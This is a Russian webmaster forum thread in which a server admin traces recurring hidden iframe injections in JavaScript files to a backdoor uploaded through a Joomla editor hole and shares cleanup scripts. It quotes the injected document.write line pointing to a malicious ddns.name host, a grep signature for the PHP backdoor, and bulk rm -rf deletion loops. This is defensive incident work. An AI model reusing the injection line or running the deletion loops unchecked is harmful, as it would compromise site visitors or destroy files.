Форум Сайтостроение Администрирование серверов

Iframe вставки в JS файлы по инициативе сервера

12
Agel Nash
На сайте с 01.12.2008
Offline
61
Agel Nash
2049

Всем привет. Возникла интересная задачка: имеется сервер CentOS и несколько пользователей. У одного из пользователей в каждом файле JS появляются Iframe вставки. Причем, если их удалить через SSH при помощи find + sed или просто через SFTP/FTP отредактировать, то через 5-10 минут опять появляется эта вставка.

1) Сменил пароли

2) На всякий случай компьютер проверил антивирусом

3) Период выполнения всем задачам из Cron'a поставил 1 год (через ISPmanager)

Но проблема так и осталась не решеной. Изначально я подумал, что сервак порутали. Но непонятно осталось почему только с 1 пользователем такая мистика? Где еще можно поковырять?

Я (http://agel-nash.ru) - вильгельм "ЗАКОЛЕБАТЕЛЬ" Аудит безопасности MODX сайтов (/ru/forum/783778) | Обучение созданию сайтов (http://modcoach.info/)
zhitov
На сайте с 30.01.2005
Offline
219
zhitov
#1
Agel Nash:
Где еще можно поковырять?

Логично в файлах покопать.

Строительные калькуляторы ( https://www.zhitov.com/ )
Andreyka
На сайте с 19.02.2005
Offline
822
Andreyka
#2

Льют через дыру в сайте

Не стоит плодить сущности без необходимости
Romka_Kharkov
На сайте с 08.04.2009
Offline
485
Romka_Kharkov
#3

В логах веб сервера смотрите, скорее всего там будет ответ на ваши вопросы, причем логи смотреть надо по всем vhosts которые в системе принадлежат скомпрометированному акаунту.

Есть около 15.000 ipv4 !!! (http://onyx.net.ua/price.php#ipv4) Качественный хостинг с 2005 года - лучшее клиентам! (http://onyx.net.ua/)
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#4

joomla ???

примерно такое

;document.write('iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://uozbzze. ddns. name/17214ca8a. xan?11"/iframe');

???

если да:

- смотрите папку/подпапки images туда скорее всего залит index.php с вирусным скриптом (около 1кБ)

- когда правите js ставьте на них 444, временно поможет

- потом смотрите остальные папки на сайте (а потом и другие сайты тоже), там где не было скорее всего тоже залит index.php

дырка /ru/forum/762978

P.S. могу помочь очистить, обращайтесь...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
Agel Nash
На сайте с 01.12.2008
Offline
61
Agel Nash
#5
kgtu5:
joomla ???
примерно такое

???

если да:
- смотрите папку/подпапки images туда скорее всего залит index.php с вирусным скриптом (около 1кБ)
- когда правите js ставьте на них 444, временно поможет
- потом смотрите остальные папки на сайте (а потом и другие сайты тоже), там где не было скорее всего тоже залит index.php

дырка /ru/forum/762978

P.S. могу помочь очистить, обращайтесь...

Да, действительно, один из сайтоиков на джумоле работал. Файл нашел. Спасибо большое.

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#6

Обновление редактора можно взять тут

http://www.joomlacontenteditor.net/downloads/editor
Agel Nash
На сайте с 01.12.2008
Offline
61
Agel Nash
#7

В общем

1) удалил этот говно-сайт

2) удалил зараженные файлы php 

find . -name "*.php" -type f | grep -rl '); exit(0); } if(isset($_REQUEST\[' . | while read FILENAME; rm -rf $FILENAME; echo "$FILENAME"; done;

3) Удалил файлы jse

#!/bin/sh
if [ -d "$1" ]
then
    runFolder=$1
else
    runFolder=$PWD
fi

function checkFile(){
    runFolderName=$1
    for endFile in `find $1 -type f -name "*js" -exec basename "{}" \; sed -r 's/(.*)\..*/\1/' | sort -u`
    do
        for delFile in `find $1 -type f \( -name "$endFile.js*" -not -name "$endFile.js" \)`
        do
            echo "FindFile: " $delFile
            $(rm -rf $delFile)
        done
    done
}

checkFile $runFolder

4) удалил все iframe вставки в js файлах

find . -name "*.js" -type f | grep -rl 'http://trxgotvs.ddns.name' . | while read FILENAME; do sed -ie 's~document.write([[:graph:]]<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://trxgotvs.ddns.name/64da4cae75d07b0fcc017695df0981b.rew?11"></iframe>[[:graph:]]);~;~' $FILENAME; echo "$FILENAME"; done;

Всем спасибо за помощь. Хотя правда остался вопрос. С каких это перепугов появляются jse файлы...

[Удален]
#8

у меня на сайтах тоже такое появляется внизу - это как я понял со стороны хостинга идет подключение и в них там проверка на наличие флеш плеера и такие технические

D
На сайте с 28.06.2008
Offline
1101
Dram
#9

Проверяйте все папки. У меня на одном из сайтов не помогла чистка только папки images

Вирусные файлы были почти в каждой папке и куча файлов были изменены.

Я просто все удалил, востановил чистый бекап, и уже в нем удалил нафиг редактор JCE

Вирус Wordpress Проверка Cloudflare, хотя я Если разрешить индексацию всего
[Удален]
#10

Вот скрипт проверки уязвимостей и шеллов ,вирусов http://revisium.com/ai/

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий